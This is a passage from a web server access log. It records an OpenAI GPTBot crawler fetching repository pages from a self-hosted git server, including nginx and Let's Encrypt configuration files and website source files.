Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates/index.html" -[17/Feb/2026:15:32:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/QUICKSTART.md?display=rendered" [Client 74.7.227.38] [Length 12769] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/QUICKSTART.md" -[17/Feb/2026:15:32:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/4.conf" [Client 74.7.227.38] [Length 9920] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/4.conf" -[17/Feb/2026:15:32:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/2.conf" [Client 74.7.227.38] [Length 9947] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/2.conf" -[17/Feb/2026:15:32:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/3.conf" [Client 74.7.227.38] [Length 9920] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/3.conf" -[17/Feb/2026:15:32:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/1.conf" [Client 74.7.227.38] [Length 9920] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/1.conf" -[17/Feb/2026:15:32:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/4.conf" [Client 74.7.227.38] [Length 9947] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/4.conf" -[17/Feb/2026:15:32:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/1.conf" [Client 74.7.227.38] [Length 9946] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/1.conf" -[17/Feb/2026:15:33:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/2.conf" [Client 74.7.227.38] [Length 9920] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/nginx/proxy_host/2.conf" -[17/Feb/2026:15:33:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/3.conf" [Client 74.7.227.38] [Length 10139] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/nginx/proxy_host/3.conf" -[17/Feb/2026:15:33:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fstatus.json" [Client 74.7.227.38] [Length 22620] [Gzip 3.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/status.json" -[17/Feb/2026:15:33:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" [Client 74.7.227.38] [Length 11381] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0" -[17/Feb/2026:15:33:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/components/ChatBot.tsx" -[17/Feb/2026:15:33:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/components/ChatBot.tsx" -[17/Feb/2026:15:33:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/components/Contact.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/components/Contact.tsx" -[17/Feb/2026:15:33:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/components/Contact.tsx" -[17/Feb/2026:15:33:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/App.tsx" [Client 74.7.227.38] [Length 12976] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html" -[17/Feb/2026:15:33:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest?display=rendered" [Client 74.7.227.38] [Length 11662] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest" -[17/Feb/2026:15:33:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest?display=rendered" [Client 74.7.227.38] [Length 11663] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest" -[17/Feb/2026:15:33:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest?display=rendered" [Client 74.7.227.38] [Length 11661] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest" -[17/Feb/2026:15:33:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest?display=rendered" [Client 74.7.227.38] [Length 11660] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PythonTest" -[17/Feb/2026:15:33:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest?display=rendered" [Client 74.7.227.38] [Length 11661] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/PythonTest" -[17/Feb/2026:15:33:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest?display=rendered" [Client 74.7.227.38] [Length 11654] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest" -[17/Feb/2026:15:33:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.2?display=rendered" [Client 74.7.227.38] [Length 10996] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.2" -[17/Feb/2026:15:33:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" [Client 74.7.227.38] [Length 10432] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" -[17/Feb/2026:15:33:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" [Client 74.7.227.38] [Length 9920] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" -[17/Feb/2026:15:33:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" [Client 74.7.227.38] [Length 287] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs" -[17/Feb/2026:15:33:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-2.conf?display=source" [Client 74.7.227.38] [Length 11683] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-2.conf" -[17/Feb/2026:15:33:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/App.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/App.tsx" -[17/Feb/2026:15:33:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/App.tsx" -[17/Feb/2026:15:33:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/App.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/App.tsx" -[17/Feb/2026:15:33:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/App.tsx" -[17/Feb/2026:15:33:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/html/App.tsx" [Client 74.7.227.38] [Length 12706] [Gzip 5.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/App.tsx" -[17/Feb/2026:15:33:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/App.tsx" [Client 74.7.227.38] [Length 800] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/App.tsx" -[17/Feb/2026:15:33:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/App.tsx" [Client 74.7.227.38] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/App.tsx" -[17/Feb/2026:15:33:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.5?display=rendered" [Client 74.7.227.38] [Length 10995] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.5" -[17/Feb/2026:15:33:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.7?display=rendered" [Client 74.7.227.38] [Length 10927] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.7" -[17/Feb/2026:15:33:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-4.conf?display=source" [Client 74.7.227.38] [Length 11690] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-4.conf" -[17/Feb/2026:15:33:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-7.conf?display=source" [Client 74.7.227.38] [Length 11664] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-7.conf" -[17/Feb/2026:15:33:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-7.conf?display=source" [Client 74.7.227.38] [Length 11693] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-7.conf" -[17/Feb/2026:15:33:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-2.conf?display=source" [Client 74.7.227.38] [Length 11713] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-2.conf" -[17/Feb/2026:15:33:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.4?display=rendered" [Client 74.7.227.38] [Length 10966] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.4" -[17/Feb/2026:15:33:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.4?display=rendered" [Client 74.7.227.38] [Length 10995] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.4" -[17/Feb/2026:15:33:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/App.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/App.tsx" -[17/Feb/2026:15:33:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/App.tsx" -[17/Feb/2026:15:33:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/App.tsx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/App.tsx" -[17/Feb/2026:15:33:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/App.tsx" -[17/Feb/2026:15:33:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.2?display=rendered" [Client 74.7.227.38] [Length 10967] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.2" -[17/Feb/2026:15:33:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-6.conf?display=source" [Client 74.7.227.38] [Length 11719] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/letsencrypt/renewal/npm-6.conf" -[17/Feb/2026:15:33:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.3?display=rendered" [Client 74.7.227.38] [Length 10966] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.3" -[17/Feb/2026:15:33:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-6.conf?display=source" [Client 74.7.227.38] [Length 11689] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/letsencrypt/renewal/npm-6.conf" -[17/Feb/2026:15:33:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.3?display=rendered" [Client 74.7.227.38] [Length 10996] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.3" -[17/Feb/2026:15:33:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.6?display=rendered" [Client 74.7.227.38] [Length 10966] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.6" -[17/Feb/2026:15:33:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.7?display=rendered" [Client 74.7.227.38] [Length 10954] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.7" -[17/Feb/2026:15:33:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.1?display=rendered" [Client 74.7.227.38] [Length 10966] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.1" -[17/Feb/2026:15:33:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.1?display=rendered" [Client 74.7.227.38] [Length 10997] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.1" -[17/Feb/2026:15:33:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr 